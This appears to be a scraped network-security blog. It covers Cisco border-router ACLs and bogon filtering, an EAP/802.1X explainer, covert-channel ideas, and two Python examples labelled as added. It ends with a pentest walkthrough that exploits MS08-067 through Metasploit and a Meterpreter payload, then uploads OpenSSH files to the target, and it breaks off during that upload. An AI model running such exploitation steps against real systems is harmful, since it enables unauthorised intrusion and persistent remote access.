</div><div style="font-family: Georgia,"Times New Roman",serif;">In general, having the “no ip directed-broadcast” statement on all router interfaces is a best practice and has in fact become the Cisco IOS default. As stated above, you also have the option of “ip directed-broadcast ACLNAME” to exert more control. Note that you can make an ACL very specific, down to layer 4 protocol and destination ports if you like; however, you are still risking DoS by allowing any directed broadcast.<br />
<br />
<b>6. Protect your router control-plane from DoS</b><br />
<br />
In the commonly deployed Catalyst-6500 line of router/switches, there are various rate limiters available to assist in protecting the control plane of the router. There are also some useful limits built into the dynamic world of multicast routing. Here are a few items that can be researched further and deployed to any one site's taste:<br />
<br />
ip pim register rate-limit<br />
ip multicast route-limit<br />
<br />
mls rate-limit<br />
- can apply to unicast, multicast, bridged traffic, or all traffic<br />
- can be applied in sub-systems such as ACLs, IP forwarding, and CEF<br />
<br />
Note that in the hardware based router models such as the Cat-6500, some of these rate limiters also impact ICMP transmission behavior, and interact with the switch virtual interface or routed interface configurations (such as: ip unreachables, and ip redirects).<br />
<br />
<br />
<br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><u><b>Internet Access Layer / Border Router Filtering Policy</b></u></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>1. Anti-spoofing and Layer 4 Protocol Filtering</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Anti-spoofing is a simple concept that needs to be a standard security practice. No datagram with a source address of your site’s IP address allocation should originate from outside of your network. Additionally, you should never send a datagram with your internal allocated network outside of your network.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Anti-spoofing controls can additionally be combined with Layer 4 protocol filtering to ensure that only the desired layer 4 protocols flow into/out of any network.</div><div style="font-family: Georgia,"Times New Roman",serif;">Let's imagine that your public address allocation is 240.55.0.0/16. Yes, I know this is considered to be IANA Class E reserved right now, but let's use it for our example. Let's also imagine that you want to perform anti-spoof filtering, and pass IPsec related protocols, GRE, as well as ICMP, TCP, and UDP across your border routers.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">In this example, Cisco IOS based ACLs can be created as follows, and naturally on your border interface you would have “no ip unreachables” to prevent ACL mapping:</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;">ip access-list extended Border-Inbound</div><div style="font-family: "Courier New",Courier,monospace;"> 10 permit gre any 240.55.0.0 0.0.255.255</div><div style="font-family: "Courier New",Courier,monospace;"> 20 permit ahp any 240.55.0.0 0.0.255.255</div><div style="font-family: "Courier New",Courier,monospace;"> 30 permit esp any 240.55.0.0 0.0.255.255</div><div style="font-family: "Courier New",Courier,monospace;"> 40 permit icmp any 240.55.0.0 0.0.255.255</div><div style="font-family: "Courier New",Courier,monospace;"> 50 permit tcp any 240.55.0.0 0.0.255.255</div><div style="font-family: "Courier New",Courier,monospace;"> 60 permit udp any 240.55.0.0 0.0.255.255</div><div style="font-family: "Courier New",Courier,monospace;"> 99 deny ip any any log-input</div><div style="font-family: "Courier New",Courier,monospace;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;">ip access-list extended Border-Outbound</div><div style="font-family: "Courier New",Courier,monospace;"> 10 permit gre 240.55.0.0 0.0.255.255 any</div><div style="font-family: "Courier New",Courier,monospace;"> 20 permit ahp 240.55.0.0 0.0.255.255 any</div><div style="font-family: "Courier New",Courier,monospace;"> 30 permit esp 240.55.0.0 0.0.255.255 any</div><div style="font-family: "Courier New",Courier,monospace;"> 40 permit icmp 240.55.0.0 0.0.255.255 any</div><div style="font-family: "Courier New",Courier,monospace;"> 50 permit tcp 240.55.0.0 0.0.255.255 any</div><div style="font-family: "Courier New",Courier,monospace;"> 60 permit udp 240.55.0.0 0.0.255.255 any</div><div style="font-family: "Courier New",Courier,monospace;"> 99 deny ip any any log-input</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">In all likelihood, your site may well have more strict ICMP policies than allowing all ICMP to pass through the border router interface(s). A policy which allows ICMP type 11 (time exceeded), for “traceroute” purposes, might be appropriate. Or even a policy that completely denies ICMP at the network border in some cases. It is common knowledge in the security community that ICMP has been used to tunnel other protocols, or as a control channel mechanism. ICMP Echo Request/Reply are often targeted for tunneling or command/control channel activities.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>2. Bogon address filtering</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Although IPv4 address resources are dwindling, there are still IP address blocks which are unallocated or reserved by the Internet Assigned Numbers Authority (IANA).</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><a href="http://www.iana.org/assignments/ipv4-address-space/">http://www.iana.org/assignments/ipv4-address-space/</a></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Network security engineers should always filter/drop any datagram that arrives at their network edge with a reserved or unallocated source address. Within the interior of a network, any datagram that is destined for a reserved or unallocated address could either be null routed, or perhaps directed to a security device for analysis and/or detention. This is where we enter the realm of Tom Liston’s LaBrea Tarpit or perhaps a honeynet.org project.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Note that IP address allocations continue to happen and thus any security enforcement implementation that deals with unallocated address filtering / forwarding, needs to be updated on a regular basis.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Team Cymru continues to maintain a bogon address space reference with various filtering techniques:</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><a href="http://www.team-cymru.org/Services/Bogons/">http://www.team-cymru.org/Services/Bogons/</a><br />
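The anti-spoofing ACL and the bogon filter, as one added Python example (not from the original post): a parser for the Cisco-style extended ACL syntax used in the Border-Inbound list above, an evaluator applying first-match semantics with wildcard masks, and a bogon source check placed in front of it. One thing the evaluator makes visible is that Border-Inbound as listed permits datagrams whose source lies inside 240.55.0.0/16, since every permit entry uses a source of "any"; a leading deny for our own prefix, which is what the anti-spoofing rule calls for, is added in a second copy of the list. The bogon prefixes are a constructed subset of reserved space (the documentation ranges are left out only so they can serve as "public" sample sources); a real deployment tracks Team Cymru's current list as the text says.

```python
# Added example, not from the original post: evaluate Cisco-style extended ACL
# entries (the Border-Inbound list from this page) with a bogon source check
# in front. Sample packets and the bogon subset are constructed.
import ipaddress

BORDER_INBOUND = """
ip access-list extended Border-Inbound
 10 permit gre any 240.55.0.0 0.0.255.255
 20 permit ahp any 240.55.0.0 0.0.255.255
 30 permit esp any 240.55.0.0 0.0.255.255
 40 permit icmp any 240.55.0.0 0.0.255.255
 50 permit tcp any 240.55.0.0 0.0.255.255
 60 permit udp any 240.55.0.0 0.0.255.255
 99 deny ip any any log-input
"""
# Same list with one leading entry so our own 240.55.0.0/16 can never arrive
# from outside (the anti-spoofing rule stated in the text).
BORDER_INBOUND_ANTISPOOF = BORDER_INBOUND.replace(
    " 10 permit gre", " 5 deny ip 240.55.0.0 0.0.255.255 any log-input\n 10 permit gre")

PROTO_NUMBERS = {"ip": None, "icmp": 1, "tcp": 6, "udp": 17, "gre": 47, "esp": 50, "ahp": 51}

# Constructed subset of reserved space; documentation ranges (192.0.2.0/24,
# 198.51.100.0/24, 203.0.113.0/24) are omitted so they can play "public" below.
BOGONS = [ipaddress.ip_network(p) for p in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4")]


def _address_spec(tokens):
    """Consume 'any' or 'A.B.C.D WILDCARD' from tokens; return (value, care_mask)
    where care_mask has 1-bits for every address bit the wildcard says to match."""
    first = tokens.pop(0)
    if first == "any":
        return 0, 0
    wildcard = int(ipaddress.IPv4Address(tokens.pop(0)))
    care = ~wildcard & 0xFFFFFFFF
    return int(ipaddress.IPv4Address(first)) & care, care


def parse_acl(text: str):
    """Return [(seq, action, proto_number_or_None, src_spec, dst_spec, logged)]."""
    entries = []
    for line in text.strip().splitlines():
        parts = line.split()
        if not parts[0].isdigit():        # the 'ip access-list extended NAME' header
            continue
        seq, action, proto, rest = int(parts[0]), parts[1], PROTO_NUMBERS[parts[2]], parts[3:]
        src, dst = _address_spec(rest), _address_spec(rest)
        entries.append((seq, action, proto, src, dst, bool(rest and rest[0].startswith("log"))))
    return entries


def evaluate(acl, proto: int, src: str, dst: str):
    """First matching entry wins, exactly as the router applies it; falling off
    the end is the implicit deny."""
    s, d = int(ipaddress.IPv4Address(src)), int(ipaddress.IPv4Address(dst))
    for seq, action, p, (snet, smask), (dnet, dmask), logged in acl:
        if p is not None and p != proto:
            continue
        if (s & smask) != snet or (d & dmask) != dnet:
            continue
        return action, seq, logged
    return "deny", None, False


def is_bogon(address: str) -> bool:
    addr = ipaddress.IPv4Address(address)
    return any(addr in net for net in BOGONS)


def border_inbound_decision(acl, proto: int, src: str, dst: str) -> str:
    """Bogon source filter first, then the interface ACL."""
    if is_bogon(src):
        return "drop (bogon source)"
    action, seq, logged = evaluate(acl, proto, src, dst)
    return f"{action} (seq {seq}{', logged' if logged else ''})"


# Constructed inbound packets: (protocol number, source, destination)
SAMPLES = [
    (6, "203.0.113.5", "240.55.1.10"),     # ordinary TCP to our space
    (47, "198.51.100.7", "240.55.200.1"),  # GRE tunnel endpoint
    (6, "240.55.3.3", "240.55.1.10"),      # our own prefix arriving from outside: spoofed
    (6, "10.1.2.3", "240.55.1.10"),        # RFC 1918 source on the Internet side
    (1, "203.0.113.9", "240.56.0.1"),      # ICMP to a prefix that is not ours
]


def run(acl_text=BORDER_INBOUND):
    acl = parse_acl(acl_text)
    return [border_inbound_decision(acl, *pkt) for pkt in SAMPLES]


if __name__ == "__main__":
    for label, text in (("as written", BORDER_INBOUND), ("with anti-spoof entry", BORDER_INBOUND_ANTISPOOF)):
        print(label, run(text))
```

Running both lists side by side is the check worth keeping: the third sample is permitted by sequence 50 of the list as written and denied (and logged) by the added sequence 5, which is the inbound half of the anti-spoofing rule; the outbound half is the mirror image, a deny for everything whose source is not 240.55.0.0/16.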
<br />
<b>3. Strategic Null Routing </b><br />
<br />
Create a static route for your shortest network prefix. If we take the same 240.55.0.0/16 network example above, then create a static route to null0 for this prefix within your routing infrastructure as follows:<br />
<br />
ip route 240.55.0.0 255.255.0.0 null0<br />
<br />
All of your connected sub-networks will have longer prefixes than the /16 null route example above, and thus traffic for all advertised routes within your network will get to destinations just fine. Any sub-network that you do not have allocated (dark space) will get dropped into the sink. You might also need a route like this to advertise to your upstream BGP provider anyway.<br />
<br />
You might want to null route some other address prefixes you don't want running around your public facing network, such as RFC-1918 space for example.<br />
<br />
<b>4. Basic BGP Security Tips</b><br />
<br />
I don't claim to be an expert in BGP; however, some basic security principles can be applied as follows:<br />
<br />
(a) Include an ACL on your border interfaces to allow TCP port 179 traffic exclusively from your upstream BGP peering neighbor.<br />
(b) Use an MD5 hash/password with your BGP peers.<br />
(c) Use ip-prefix lists either directly or within route-maps to ensure that you are only advertising the prefixes you intend. If you have created a static null route for your entire network allocation, you might want to only advertise this prefix to your upstream.<br />
(d) Use ip-prefix lists to only accept the routes you desire from your upstream. You can filter unallocated IP space (bogons) using this prefix list. You might have reasons to accept only a subset of routes from a specific provider.<br />
(e) Set a maximum Autonomous System (AS) Path limit to limit risks of accepting an unusually long AS Path.<br />
<br />
<br />
<br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div>
<br /><br /><b>Windows 7 - ICMP message type 12, code 0</b><br />
Published 2009-10-06T13:49:00.000-07:00, updated 2009-10-06T14:30:14.248-07:00.<br /><br />
Send a TCP packet to any port with the IP "more fragments" bit set to a Windows 7 host. The packet can be sent with no application payload, and arbitrary TCP flags.<br /><br />Windows 7 will send back an ICMP message type 12, code 0 reply indicating a "parameter problem".<br /><br />Now repeat the experiment, only increase the payload to 92 bytes. Anything greater than 91 will not result in the ICMP return packet.<br /><br />Hmmm....<br /><br /><span style="font-family:courier new;font-size:85%;">17:24:10.268903 IP (tos 0x0, ttl 64, id 2468, offset 0, flags [+], proto: TCP (6), length: 40) 192.168.100.1.445 > 192.168.100.129.445: S, cksum 0x3984 (correct), 950565187:950565187(0) win 512<br />
0x0000: 4500 0028 09a4 2000 4006 0759 c0a8 6401 E..(....@..Y..d.<br />
0x0010: c0a8 6481 01bd 01bd 38a8 7943 2ede 4647 ..d.....8.yC..FG<br />
0x0020: 5002 0200 3984 0000 P...9...<br />
<br />
17:24:10.269784 IP (tos 0x0, ttl 128, id 20600, offset 0, flags [none], proto: ICMP (1), length: 68) 192.168.100.129 > 192.168.100.1: ICMP parameter problem - octet 0, length 48<br />
IP (tos 0x0, ttl 64, id 2468, offset 0, flags [+], proto: TCP (6), length: 40) 192.168.100.1.445 > 192.168.100.129.445: S, cksum 0x3984 (correct), 950565187:950565187(0) win 512<br />
0x0000: 4500 0044 5078 0000 8001 a06d c0a8 6481 E..DPx.....m..d.<br />
0x0010: c0a8 6401 0c00 3dec 0000 0002 4500 0028 ..d...=.....E..(<br />
0x0020: 09a4 2000 4006 0759 c0a8 6401 c0a8 6481 ....@..Y..d...d.<br />
0x0030: 01bd 01bd 38a8 7943 2ede 4647 5002 0200 ....8.yC..FGP...<br />
0x0040: 3984 0000 9...</span><br /><br />
<b>802.1X and EAP</b><br />
Published 2009-06-11T05:53:00.000-07:00, updated 2010-06-04T14:07:45.949-07:00.<br /><br />
EAP = Extensible Authentication Protocol, a universal layer 2 based authentication protocol used on point-to-point, wired, and wireless networks. EAP is used by 802.1X for port based network access authentication. There are many EAP types; however, the most commonly used are EAP-PEAP and EAP-TTLS.<br />
<br />
1) EAP-TLS is well supported and used by wireless vendors, although a challenge to implement as it requires both a client-side and a server-side certificate. General comment is that EAP-TLS is the best security option but also the most difficult to implement.<br />
<br />
2) EAP-TTLS was co-developed by Funk and Certicom. It differs from EAP-TLS in that only the server needs to be authenticated to the client by certificate (signed by a public or private CA). 802.1X supplicants need to properly verify the certificate, otherwise the potential for man-in-the-middle interception exists (when used with wireless). Microsoft does not natively support EAP-TTLS.<br />
<br />
3) EAP-PEAP is a joint effort of Cisco, Microsoft, and RSA and is widely in use. Similar to EAP-TTLS, MS-CHAPv2 login credentials are protected by TLS during the authentication process. Bottom line is that if you are dealing with the Microsoft 802.1X supplicant (which most of us probably would be), then PEAP is your friend.<br />
<br />
There seems to be very little in the way of documentation on the net with regard to how 802.1X port authentication and EAP-PEAP actually function. It is an interesting protocol dance when you have Protected Extensible Authentication Protocol (PEAP) involving layer 2 traffic from the 802.1X supplicant, protected by TLS within the EAP over LAN (EAPOL) transactions, and also with the TLS data carried within the Radius attribute value pairs.<br />
<br />
The server side certificate presented via Radius back to the client may be a public CA signed, or internal/privately signed certificate. In either case, it is critical that the 802.1X supplicant (client station) has a properly imported root certificate.<br />
<br />
With regard to the EAPOL (EAP over LAN) transactions, a lot of documentation I have read fails to recognize that an EAP-Request/Identity frame is always initiated from the switch first with link up. I only mention this point as it came to light in recent EAPOL debugging/diagnostic work I was involved in.<br />
<br />
And BTW, if you are ever looking at 802.1X/PEAP/Radius authentication traffic, a useful 'tcpdump' filter is as follows:<br />
<br />
'ether proto 0x888e OR udp port 1812'<br />
<br />
This assumes that Radius traffic is being carried on UDP port 1812 and that you are able to mirror/span the data from your AP/switch (authenticator) as well as your client/supplicant.<br />
<br />
The EAP transactions occur at OSI layer 2 between the supplicant and the authenticator, while the synchronized Radius transactions occur at OSI layer 3 between the AP/switch authenticator and the Radius server. The TLS certificate and data are carried both within the EAP traffic and within the Radius attribute-value pairs between client/supplicant and Radius server.<br />
<br />
Thus, your network management network better be functioning reliably!<br />
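The protocol dance described above, as an added Python example that is not from the original post or any vendor: a single EAP-Response/Identity packet is built, wrapped in an EAPOL frame (EtherType 0x888e, the first half of the tcpdump filter above) as it travels from supplicant to authenticator, then relayed byte-for-byte inside EAP-Message attributes of a RADIUS Access-Request (UDP 1812, the second half of the filter) together with the Message-Authenticator that RFC 3579 requires the server to verify. The MAC addresses, the identity and the shared secret are constructed values.

```python
# Added example, not from the original post or any vendor: one EAP
# Response/Identity packet in both encapsulations the text describes, EAPOL
# between supplicant and authenticator (EtherType 0x888e) and inside a RADIUS
# Access-Request (UDP 1812) between authenticator and server, with the
# RFC 3579 Message-Authenticator the server must verify. MAC addresses,
# identity and shared secret are constructed values.
import hashlib
import hmac
import os
import struct

EAPOL_ETHERTYPE = 0x888E
PAE_GROUP_MAC = bytes.fromhex("0180c2000003")   # 802.1X PAE group destination address
EAP_RESPONSE, EAP_TYPE_IDENTITY = 2, 1
RADIUS_ACCESS_REQUEST = 1
ATTR_USER_NAME, ATTR_EAP_MESSAGE, ATTR_MESSAGE_AUTHENTICATOR = 1, 79, 80


def build_eap_identity_response(identifier: int, identity: bytes) -> bytes:
    """EAP header: code(1) id(1) length(2) type(1), then the identity string."""
    return struct.pack("!BBHB", EAP_RESPONSE, identifier, 5 + len(identity), EAP_TYPE_IDENTITY) + identity


def build_eapol_frame(supplicant_mac: bytes, eap: bytes) -> bytes:
    """Ethernet header + EAPOL header (version 1, packet type 0 = EAP-Packet) + EAP."""
    return (PAE_GROUP_MAC + supplicant_mac + struct.pack("!H", EAPOL_ETHERTYPE)
            + struct.pack("!BBH", 1, 0, len(eap)) + eap)


def parse_eapol_frame(frame: bytes) -> dict:
    """Layer 2 side: what 'ether proto 0x888e' shows between supplicant and switch/AP."""
    if struct.unpack("!H", frame[12:14])[0] != EAPOL_ETHERTYPE:
        raise ValueError("not an EAPOL frame")
    _version, packet_type, length = struct.unpack("!BBH", frame[14:18])
    eap = frame[18:18 + length]
    code, eap_id, eap_len, eap_type = struct.unpack("!BBHB", eap[:5])
    return {"supplicant_mac": frame[6:12].hex(":"), "eapol_type": packet_type,
            "eap_code": code, "eap_id": eap_id, "eap_type": eap_type,
            "identity": eap[5:eap_len], "eap": eap}


def _avp(attr_type: int, value: bytes) -> bytes:
    return struct.pack("!BB", attr_type, 2 + len(value)) + value


def build_access_request(identifier: int, request_authenticator: bytes, identity: bytes,
                         eap: bytes, secret: bytes) -> bytes:
    """Layer 3 side: the authenticator relays the EAP bytes unchanged inside
    EAP-Message AVPs (253-byte pieces for long TLS records) and signs the packet:
    Message-Authenticator = HMAC-MD5(secret, packet with that value zeroed)."""
    attrs = _avp(ATTR_USER_NAME, identity)
    for i in range(0, len(eap), 253):
        attrs += _avp(ATTR_EAP_MESSAGE, eap[i:i + 253])
    attrs += _avp(ATTR_MESSAGE_AUTHENTICATOR, bytes(16))
    packet = (struct.pack("!BBH", RADIUS_ACCESS_REQUEST, identifier, 20 + len(attrs))
              + request_authenticator + attrs)
    return packet[:-16] + hmac.new(secret, packet, hashlib.md5).digest()


def parse_access_request(packet: bytes, secret: bytes) -> dict:
    """Server side: reassemble EAP-Message, then verify Message-Authenticator."""
    code, identifier, length = struct.unpack("!BBH", packet[:4])
    pos, eap, user_name, ma_pos = 20, b"", None, None
    while pos < length:
        attr_type, attr_len = packet[pos], packet[pos + 1]
        value = packet[pos + 2:pos + attr_len]
        if attr_type == ATTR_EAP_MESSAGE:
            eap += value                       # fragments are concatenated in order
        elif attr_type == ATTR_USER_NAME:
            user_name = value
        elif attr_type == ATTR_MESSAGE_AUTHENTICATOR:
            ma_pos = pos + 2
        pos += attr_len
    if ma_pos is None:
        raise ValueError("EAP-Message without Message-Authenticator: discard (RFC 3579)")
    zeroed = packet[:ma_pos] + bytes(16) + packet[ma_pos + 16:]
    expected = hmac.new(secret, zeroed, hashlib.md5).digest()
    return {"code": code, "id": identifier, "user_name": user_name, "eap": eap,
            "message_authenticator_ok": hmac.compare_digest(expected, packet[ma_pos:ma_pos + 16])}


def demo(secret: bytes = b"constructed-shared-secret") -> dict:
    identity = b"alice@example.net"
    eap = build_eap_identity_response(1, identity)
    on_wire = parse_eapol_frame(build_eapol_frame(bytes.fromhex("001122334455"), eap))
    request = build_access_request(7, os.urandom(16), on_wire["identity"], on_wire["eap"], secret)
    at_server = parse_access_request(request, secret)
    tampered = bytearray(request)
    tampered[22] ^= 0x01                       # flip one bit of User-Name in transit
    return {"identity": at_server["user_name"],
            "eap_identical_in_both_encapsulations": on_wire["eap"] == at_server["eap"],
            "message_authenticator_ok": at_server["message_authenticator_ok"],
            "tampered_message_authenticator_ok":
                parse_access_request(bytes(tampered), secret)["message_authenticator_ok"]}


if __name__ == "__main__":
    print(demo())
```

The verification step is the defender's interest here: a RADIUS server must discard an Access-Request that carries EAP-Message without a valid Message-Authenticator, because the Request Authenticator alone does not protect the EAP payload; the tampered copy in demo() shows a single flipped bit being caught, which is also why the shared secret between authenticator and server needs real entropy.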
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIoeFEX7AnZf_BvLS7Bd9qn_2rHnmeQigVbBGet1XoLRqZfB-SP3KJLF2MojcWXnxVAqqNs9_-aP_dVU-ZU01Q6R1_0RJo1ZN9C7LaQ0lgMLCXN9HpBdnHTz3Rc4R9GEKpnaJy3EHNssY/s1600-h/eap-dot1x.jpg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5346055779099803522" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIoeFEX7AnZf_BvLS7Bd9qn_2rHnmeQigVbBGet1XoLRqZfB-SP3KJLF2MojcWXnxVAqqNs9_-aP_dVU-ZU01Q6R1_0RJo1ZN9C7LaQ0lgMLCXN9HpBdnHTz3Rc4R9GEKpnaJy3EHNssY/s400/eap-dot1x.jpg" style="cursor: pointer; display: block; height: 184px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a><br />
<br />
So having written all that, I wonder if we can use the EAP-Response/Identity frame to send an extremely large string or perhaps even a 'printf' based format string to exploit weaknesses in the authenticator or Radius code. At minimum, a potential denial of service could exist, if not a worse condition.<br /><br />
<b>Covert Channel Possibilities!</b><br />
Published 2009-06-10T18:48:00.000-07:00, updated 2009-06-11T19:20:52.887-07:00.<br /><br />
The IT network and security community often thinks of covert channels in terms of what has already been detected. A good example is Loki, and other ICMP variants. However, we should not forget that IP, TCP, UDP, and ICMP headers and payloads contain opportunities to hide data in storage channels.<br /><br />Header and application payload fields that can potentially be used for covert storage channels include the IP Identification field (16 bits), the TCP Initial Sequence Number (32 bits), the DNS identification field (16 bits), the TCP timestamp option (32 bits x 2), a portion (or all) of the source IP address, and a TCP or UDP source port (16 bits), just to name a few.<br /><br />Some of these fields are deliberately (and highly) randomized during certain normal protocol transactions. Thus, if we combine storage of covert data with symmetric key encryption and a nicely crafted bogus payload, we can yield a highly effective and hard to detect channel.<br /><br />When doing protocol and intrusion analysis, we should be careful to look at packet timing, and the uni-directional versus bi-directional nature of protocol transactions. You never know when you might be witnessing a covert storage or timing channel at work, and you might never really discover the content.<br /><br />
<b>Installing OpenSSH on Windows via command shell</b><br />
Published 2009-01-18T15:08:00.000-08:00, updated 2009-01-18T15:43:16.197-08:00.<br /><br />
During a network penetration test, Windows command shell access is often obtained through some sort of exploit. If, for example, Metasploit is being used, command shell access can be delivered as the payload of a buffer overflow exploit. Or if perhaps the Meterpreter is being used, command shell access can be had by executing a CMD.EXE and interacting directly with it, or perhaps by having NETCAT shovel a command shell back to the penetration tester.<br /><br />The challenge is that command shell access is not equivalent to full terminal access. The command shell may produce strange output due to control characters. Some commands may not function normally if they depend on the use of control sequences. If using NETCAT to shovel a shell, entering CTRL-C to terminate some command can end up terminating your shell!<br /><br />If a penetration tester is permitted to modify the target server, then a more consistent, fully functional terminal level access will greatly help during the testing process. A number of choices exist, including activating the telnet service, activating Microsoft terminal services (remote desktop protocol), installing VNC (www.realvnc.com), or installing OpenSSH for Windows. VNC is a great choice as it provides an easy command line installation with files residing in a single directory and only a limited number of registry entries; however, it offers no encryption.
The telnet service offers no encryption either.<br /><br />OpenSSH for Windows (<a href="http://sshwindows.sourceforge.net/">http://sshwindows.sourceforge.net/</a>) is a minimized Cygwin (<a href="http://www.cygwin.com/">http://www.cygwin.com</a>) environment that has been customized to support only SSH. It supports SSH command line terminal access, and secure copy / secure file transfer. Because the setup process in the OpenSSH packages uses the GUI, you have to perform some steps to customize your own command line only installation.<br /><br /><br /><span style="font-weight: bold;">Preparing for a custom command line OpenSSH Installation in your lab</span><br /><br />The basic steps to prepare a command line OpenSSH installation for Windows are as follows:<br /><br />1. Download the setupssh.exe installation package from <a href="http://sshwindows.sourceforge.net/download">http://sshwindows.sourceforge.net/download</a><br /><br />2. Run the GUI installer package on your Windows lab/test machine. I suggest accepting the default program location of C:\Program Files\OpenSSH<br /><br />3. Get a full copy of all of the files under the directory C:\Program Files\OpenSSH onto a USB flash drive or other favorite media. Copy recursively with XCOPY and make sure you fully retain the directory structure.<br /><br />4. Export the following registry keys using the REG EXPORT command as follows (the key names must be in straight double quotes, since they contain spaces):<br /><br /> REG EXPORT "HKLM\SOFTWARE\Cygnus Solutions" 1.REG<br /> REG EXPORT "HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd" 2.REG<br /> REG EXPORT "HKLM\SYSTEM\ControlSet001\Services\OpenSSHd" 3.REG<br /><br />5. Concatenate all of these registry files together into one file.<br /> TYPE 1.REG 2.REG 3.REG >OPENSSH.REG<br /><br />6.
Save this OPENSSH.REG file into your local copy of the whole openssh directory structure.<br /><br /><br /><span style="font-weight: bold;">Performing an installation via command shell</span><br /><br />Now that you have all of this data saved on your USB thumb drive, let's assume that our penetration testing machine is a CentOS Linux system with an IP address of 192.168.1.37, and that our target is a Windows 2003 SP0 machine with an IP address of 192.168.1.40. Our penetration testing Linux machine has our OpenSSH package files mounted under /mnt/PenTestTools/win32/OpenSSH.<br /><br />Our target happens to have the MS08-067 Server Service RPC vulnerability. Below is an example of how we exploit this vulnerability using Metasploit (www.metasploit.com) with the Meterpreter payload, upload our OpenSSH server files, add a new username, perform some minimal configuration and start the OpenSSH service.<br /><br /><br /><span style="font-weight: bold;">Exploiting the Vulnerability</span><br /><br />[root@localhost framework-3.2]# nc -v 192.168.1.40 445<br />Connection to 192.168.1.40 445 port [tcp/microsoft-ds] succeeded!<br />[root@localhost framework-3.2]# ./msfconsole<br /> <br />msf > search exploits ms08_067<br />[*] Searching loaded modules for pattern 'ms08_067'...<br />Exploits<br />========<br />Name Description <br />---- ----------- <br />windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption<br />msf > use windows/smb/ms08_067_netapi<br /><br />msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp<br />PAYLOAD => windows/meterpreter/bind_tcp<br />msf exploit(ms08_067_netapi) > set RHOST 192.168.1.40<br />RHOST => 192.168.1.40<br />msf exploit(ms08_067_netapi) > set TARGET 5<br />TARGET => 5<br />msf exploit(ms08_067_netapi) > show options<br /><br />... 
truncated output ...<br />Exploit target:<br /><br />Id Name <br />-- ---- <br />5 Windows 2003 SP0 Universal<br /><br /><br />msf exploit(ms08_067_netapi) > exploit<br />[*] Started bind handler<br />[*] Triggering the vulnerability...<br />[*] Transmitting intermediate stager for over-sized stage...(191 bytes)<br />[*] Sending stage (2650 bytes)<br />[*] Sleeping before handling stage...<br />[*] Uploading DLL (75787 bytes)...<br />[*] Upload completed.<br />[*] Meterpreter session 1 opened (192.168.1.37:45633 -> 192.168.1.40:4444)<br /><br />meterpreter > sysinfo<br />Computer: SYSTEM-HJ28HHGL7N<br />OS : Windows .NET Server (Build 3790, ).<br /><br /><br /><span style="font-weight: bold;">Uploading your OpenSSH Files</span><br /><br />meterpreter > lcd /mnt/PenTestTools/win32/OpenSSH<br />meterpreter > lpwd<br />/mnt/PenTestTools/win32/OpenSSH<br />meterpreter > cd \<br />meterpreter > cd "Program Files"<br />meterpreter > mkdir openssh<br />Creating directory: openssh<br />meterpreter > cd openssh<br />meterpreter > pwd<br />C:\Program Files\openssh<br />meterpreter > upload -r . .<br />[*] uploading : ./uninstall.exe -> .\uninstall.exe<br />[*] uploaded : ./uninstall.exe -> .\uninstall.exe<br />[*] mirroring : ./bin -> .\bin<br />[*] uploading : ./bin/chmod.exe -> .\bin\chmod.exe<br />[*] uploaded : ./bin/chmod.exe -> .\bin\chmod.exe<br />[*] uploading : ./bin/chown.exe -> .\bin\chown.exe<br />[*] uploaded : ./bin/chown.exe -> .\bin\chown.exe<br />[*] uploading : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll<br />[*] uploaded : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll<br />.... 
